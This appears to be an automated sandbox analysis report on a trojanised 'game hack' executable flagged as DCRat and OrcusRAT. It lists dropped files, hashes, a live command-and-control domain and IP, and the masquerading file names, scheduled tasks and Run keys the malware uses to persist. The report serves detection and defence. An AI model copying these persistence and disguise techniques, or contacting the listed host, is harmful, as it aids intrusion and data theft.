                      Source: Yara matchFile source: 0000001A.00000002.1846009611.00000000125BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: runtimesvc.exe PID: 4920, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: containerRuntime.exe PID: 7620, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information11
                      Scripting                      		Valid Accounts211
                      Windows Management Instrumentation                      		11
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		11
                      Input Capture                      		1
                      System Time Discovery                      		1
                      Taint Shared Content                      		1
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts3
                      Command and Scripting Interpreter                      		1
                      DLL Side-Loading                      		12
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory3
                      File and Directory Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		3
                      Obfuscated Files or Information                      		Security Account Manager147
                      System Information Discovery                      		SMB/Windows Admin Shares11
                      Input Capture                      		1
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron31
                      Registry Run Keys / Startup Folder                      		31
                      Registry Run Keys / Startup Folder                      		13
                      Software Packing                      		NTDS221
                      Security Software Discovery                      		Distributed Component Object ModelInput Capture1
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets2
                      Process Discovery                      		SSHKeylogging1
                      Proxy                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts33
                      Masquerading                      		Cached Domain Credentials131
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
                      Virtualization/Sandbox Evasion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                      Process Injection                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590018 Sample: GameHackBuild1.exe.bin.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 95 25350.client.sudorat.top 2->95 125 Suricata IDS alerts for network traffic 2->125 127 Found malware configuration 2->127 129 Malicious sample detected (through community Yara rule) 2->129 131 15 other signatures 2->131 11 GameHackBuild1.exe.bin.exe 3 13 2->11         started        15 MpDefenderCoreProtion.exe 2->15         started        signatures3 process4 file5 87 C:\Users\user\AppData\...\runtimesvc.exe, MS-DOS 11->87 dropped 89 C:\Users\user\AppData\Roaming\...\Solara.exe, MS-DOS 11->89 dropped 91 C:\Users\user\...\MpDefenderProtector.exe, PE32 11->91 dropped 93 2 other malicious files 11->93 dropped 141 Found many strings related to Crypto-Wallets (likely being stolen) 11->141 17 wscript.exe 1 11->17         started        20 GameHack.exe 10 11->20         started        23 MpDefenderProtector.exe 8 11->23         started        25 Solara.exe 1 11->25         started        signatures6 process7 file8 101 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->101 27 cmd.exe 17->27         started        71 C:\Users\user\...\containerRuntime.exe, PE32 20->71 dropped 73 C:\Users\user\...\mJEJ7PbY35CMaAu5227dvHv.vbe, data 20->73 dropped 103 Antivirus detection for dropped file 20->103 105 Multi AV Scanner detection for dropped file 20->105 107 Machine Learning detection for dropped file 20->107 29 wscript.exe 1 20->29         started        75 C:\Users\user\...\MpDefenderCoreProtion.exe, PE32 23->75 dropped 77 C:\Users\...\MpDefenderCoreProtion.exe.config, XML 23->77 dropped 31 MpDefenderCoreProtion.exe 23->31         started        109 Detected unpacking (changes PE section rights) 25->109 111 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 25->111 113 Found Tor onion address 25->113 34 WMIC.exe 25->34         started        36 conhost.exe 25->36         started        signatures9 process10 signatures11 38 runtimesvc.exe 27->38         started        42 conhost.exe 27->42         started        44 cmd.exe 29->44         started        143 Antivirus detection for dropped file 31->143 145 Multi AV Scanner detection for dropped file 31->145 147 Machine Learning detection for dropped file 31->147 46 RegAsm.exe 31->46         started        149 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 34->149 process12 dnsIp13 79 C:\Windows\security\...\SSblKNNQege.exe, MS-DOS 38->79 dropped 81 C:\Windows\Cursors\OfficeClickToRun.exe, MS-DOS 38->81 dropped 83 C:\Users\user\Desktop\wowiEjmi.log, PE32 38->83 dropped 85 14 other malicious files 38->85 dropped 133 Antivirus detection for dropped file 38->133 135 Multi AV Scanner detection for dropped file 38->135 137 Creates an undocumented autostart registry key 38->137 139 5 other signatures 38->139 49 csc.exe 38->49         started        53 containerRuntime.exe 44->53         started        55 conhost.exe 44->55         started        97 25350.client.sudorat.top 185.37.62.158, 25350, 49702, 49803 HOSTLANDRU Russian Federation 46->97 99 127.0.0.1 unknown unknown 46->99 file14 signatures15 process16 file17 61 C:\Program Files (x86)\...\msedge.exe, PE32 49->61 dropped 115 Infects executable files (exe, dll, sys, html) 49->115 57 conhost.exe 49->57         started        59 cvtres.exe 49->59         started        63 C:\Windows\...\RuntimeBroker.exe, PE32 53->63 dropped 65 C:\Windows\L2Schemas\SSblKNNQege.exe, PE32 53->65 dropped 67 C:\Users\Default\Pictures\RuntimeBroker.exe, PE32 53->67 dropped 69 6 other malicious files 53->69 dropped 117 Antivirus detection for dropped file 53->117 119 Multi AV Scanner detection for dropped file 53->119 121 Creates an undocumented autostart registry key 53->121 123 4 other signatures 53->123 signatures18 process19

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      GameHackBuild1.exe.bin.exe61%VirustotalBrowse
                      GameHackBuild1.exe.bin.exe63%ReversingLabsByteCode-MSIL.Trojan.Uztuby
                      GameHackBuild1.exe.bin.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe100%AviraTR/Dropper.Gen
                      C:\Users\Default\Pictures\RuntimeBroker.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%AviraHEUR/AGEN.1323984
                      C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe100%AviraHEUR/AGEN.1309946
                      C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe100%AviraTR/Dropper.Gen
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe100%AviraTR/Dropper.Gen
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe100%AviraVBS/Runner.VPG
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe100%AviraTR/Dropper.Gen
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe100%AviraVBS/Runner.VPG
                      C:\Users\user\AppData\Local\Temp\B2ESObyLKs.bat100%AviraBAT/Delbat.C
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe100%AviraHEUR/AGEN.1309946
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%AviraHEUR/AGEN.1323984
                      C:\Users\user\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe100%AviraVBS/Runner.VPG
                      C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe100%Joe Sandbox ML
                      C:\Users\Default\Pictures\RuntimeBroker.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe68%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Program Files (x86)\Microsoft Office\SSblKNNQege.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\SSblKNNQege.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Program Files\Microsoft\SSblKNNQege.exe68%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Program Files\Windows Portable Devices\SSblKNNQege.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\ProgramData\WindowsHolographicDevices\SSblKNNQege.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Recovery\SSblKNNQege.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SSblKNNQege.exe68%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Users\Default\Pictures\RuntimeBroker.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe66%ReversingLabsByteCode-MSIL.Trojan.ZmutzyLscpt
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe84%ReversingLabsByteCode-MSIL.Trojan.OrcusRAT
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe58%ReversingLabsWin64.Trojan.Ulise
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe68%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe84%ReversingLabsByteCode-MSIL.Trojan.OrcusRAT
                      C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Users\user\Desktop\BpJZMyRc.log29%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\Desktop\ErvIhhWY.log33%ReversingLabsWin32.Ransomware.Bitpy
                      C:\Users\user\Desktop\PxMOoBdB.log25%ReversingLabs
                      C:\Users\user\Desktop\QLuoYXmy.log4%ReversingLabs
                      C:\Users\user\Desktop\WmQvmhxk.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                      C:\Users\user\Desktop\brpMezGb.log8%ReversingLabs
                      C:\Users\user\Desktop\jdhUscxN.log3%ReversingLabs
                      C:\Users\user\Desktop\mOMkzqHG.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                      C:\Users\user\Desktop\syFrxmlp.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                      C:\Users\user\Desktop\wowiEjmi.log9%ReversingLabs
                      C:\Windows\Cursors\OfficeClickToRun.exe68%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Windows\L2Schemas\SSblKNNQege.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Windows\security\database\SSblKNNQege.exe68%ReversingLabsByteCode-MSIL.Backdoor.DCRat

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.w3.or/XmasIes0%Avira URL Cloudsafe
                      https://taskscheduler.codeplex.com/F0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      25350.client.sudorat.top
                      		185.37.62.158
                      		truetrue
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://taskscheduler.codeplex.com/MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1366464067.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000041DA000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://api.ipify.org/I(.GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/soap/encoding/MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002949000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.000000000316A000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.00000000031C9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002ECA000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.w3.or/XmasIesMpDefenderProtector.exe, 00000007.00000002.1311661641.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, runtimesvc.exe, 00000017.00000002.1874336688.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, containerRuntime.exe, 0000001A.00000002.1720636580.00000000025B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://taskscheduler.codeplex.com/FMpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1366464067.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000041DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/wsdl/MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002949000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.000000000316A000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.00000000031C9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002ECA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.37.62.158
                                  		25350.client.sudorat.topRussian Federation
                                  		62082HOSTLANDRUtrue

                                  Private

                                  IP
                                  127.0.0.1

                                  General Information

                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1590018
                                  Start date and time:2025-01-13 13:34:14 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 10m 35s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:48
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:GameHackBuild1.exe.bin.exe
                                  Detection:MAL
                                  Classification:mal100.spre.troj.spyw.expl.evad.winEXE@62/65@1/2
                                  EGA Information:
                                  • Successful, ratio: 66.7%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 273
                                  • Number of non-executed functions: 146
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, audiodg.exe, OfficeClickToRun.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, schtasks.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.253.45, 2.23.242.162, 4.175.87.197
                                  • Excluded domains from analysis (whitelisted): 729231cm.n9shteam1.top, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, 117813cm.n9shteam.in, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target MpDefenderCoreProtion.exe, PID 5456 because it is empty
                                  • Execution Graph export aborted for target Solara.exe, PID 7648 because there are no executed function
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  07:35:18API Interceptor6x Sleep call for process: Solara.exe modified
                                  07:35:22API Interceptor56x Sleep call for process: RegAsm.exe modified
                                  07:35:24API Interceptor1x Sleep call for process: WMIC.exe modified
                                  08:38:30API Interceptor48x Sleep call for process: runtimesvc.exe modified
                                  13:35:20Task SchedulerRun new task: MpDefenderProtector path: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
                                  13:35:28Task SchedulerRun new task: OfficeClickToRunO path: "C:\Windows\Cursors\OfficeClickToRun.exe"
                                  13:35:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SSblKNNQege "C:\Program Files (x86)\msbuild\SSblKNNQege.exe"
                                  13:35:32Task SchedulerRun new task: OfficeClickToRun path: "C:\Windows\Cursors\OfficeClickToRun.exe"
                                  13:35:32Task SchedulerRun new task: RuntimeBroker path: "C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe"
                                  13:35:32Task SchedulerRun new task: RuntimeBrokerR path: "C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe"
                                  13:35:33Task SchedulerRun new task: SSblKNNQege path: "C:\Program Files (x86)\msbuild\SSblKNNQege.exe"
                                  13:35:33Task SchedulerRun new task: SSblKNNQegeS path: "C:\Windows\L2Schemas\SSblKNNQege.exe"
                                  14:38:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Default\Pictures\RuntimeBroker.exe"
                                  14:38:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Windows\Cursors\OfficeClickToRun.exe"
                                  14:38:31Task SchedulerRun new task: runtimesvcr path: "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe"
                                  14:38:35Task SchedulerRun new task: runtimesvc path: "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe"
                                  14:38:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run runtimesvc "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe"
                                  14:38:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SSblKNNQege "C:\Windows\security\database\SSblKNNQege.exe"
                                  14:38:58AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Default\Pictures\RuntimeBroker.exe"
                                  14:39:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Windows\Cursors\OfficeClickToRun.exe"
                                  14:39:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run runtimesvc "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe"
                                  14:39:24AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SSblKNNQege "C:\Windows\security\database\SSblKNNQege.exe"
                                  14:39:32AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Default\Pictures\RuntimeBroker.exe"
                                  14:39:40AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Windows\Cursors\OfficeClickToRun.exe"
                                  14:39:49AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run runtimesvc "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe"

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.37.62.158Wave.exeGet hashmaliciousDiscord Token Stealer, Orcus, SugarDumpBrowse

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    HOSTLANDRU9vt8NMgLXF.exeGet hashmaliciousFormBookBrowse
                                    • 185.26.122.70
                                    TEKL#U0130F #U0130ST.exeGet hashmaliciousFormBookBrowse
                                    • 185.26.122.70
                                    hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                                    • 185.26.122.70
                                    docs.exeGet hashmaliciousFormBookBrowse
                                    • 185.26.122.70
                                    Dekont.exeGet hashmaliciousFormBookBrowse
                                    • 185.26.122.70
                                    Wave.exeGet hashmaliciousDiscord Token Stealer, Orcus, SugarDumpBrowse
                                    • 185.37.62.158
                                    DFpUKTL6kg.exeGet hashmaliciousDCRatBrowse
                                    • 185.26.122.81
                                    http://mydpd.space/Get hashmaliciousDCRat, PureLog StealerBrowse
                                    • 185.26.122.30
                                    HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeGet hashmaliciousDCRatBrowse
                                    • 185.26.122.79
                                    yk2Eh24FDd.exeGet hashmaliciousUnknownBrowse
                                    • 185.26.122.81

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Program Files (x86)\MSBuild\SSblKNNQege.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Program Files (x86)\MSBuild\f2aefc5695405c

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):194
                                    Entropy (8bit):5.635413457486011
                                    Encrypted:false
                                    SSDEEP:6:CcmWVoklcyshDQZNFoSuP/ISxmXdBQdVg2c:uOsG/oSuHPxeXN
                                    MD5:40B950A8C7A0C414B991C98695EAAB22
                                    SHA1:C5CA20700BEE380E34BE92B0D8AFC47E1D752208
                                    SHA-256:7199F75646FFE33A03E6A5970BFD351213B0D33CE0582F282D9CF3DC3457B4F7
                                    SHA-512:59FB67A93EBB0B73617ED9BF98C823BEE8DCA66DBACF26007EA09C02DCFED87D20303A9F7538969A900D817341CE8A204B33F0FFC811740E62551D6F469CD0DD
                                    Malicious:false
                                    Preview:u2yd5tsptkWBxsiMqNsep615yWIDpGafd7XZ6I9gknrFHbzQIDaAV7fyA2ojlo9mJ1i0UIQhNL4CPwyXh15lqaJfbjZDea55nE5Q3969x2wKDdjOEQCttX5tsCYutMDxQ8YK0ieh55yxo9b89K8NYLMQIMi0kLQky93EEZXfweyxjIFskZviO0YEwIBoAn6toN

                                    C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                    Category:dropped
                                    Size (bytes):569844
                                    Entropy (8bit):7.487969174812562
                                    Encrypted:false
                                    SSDEEP:12288:7GBfAoq+6b7AaSxWtkmtoIg132s/q3DMJGk58qgd/t:7mApDuWAt2F3xwk9t
                                    MD5:00C4245522082B7F87721F9A26E96BA4
                                    SHA1:993A8AA88436B6C62B74BB399C09B8D45D9FB85B
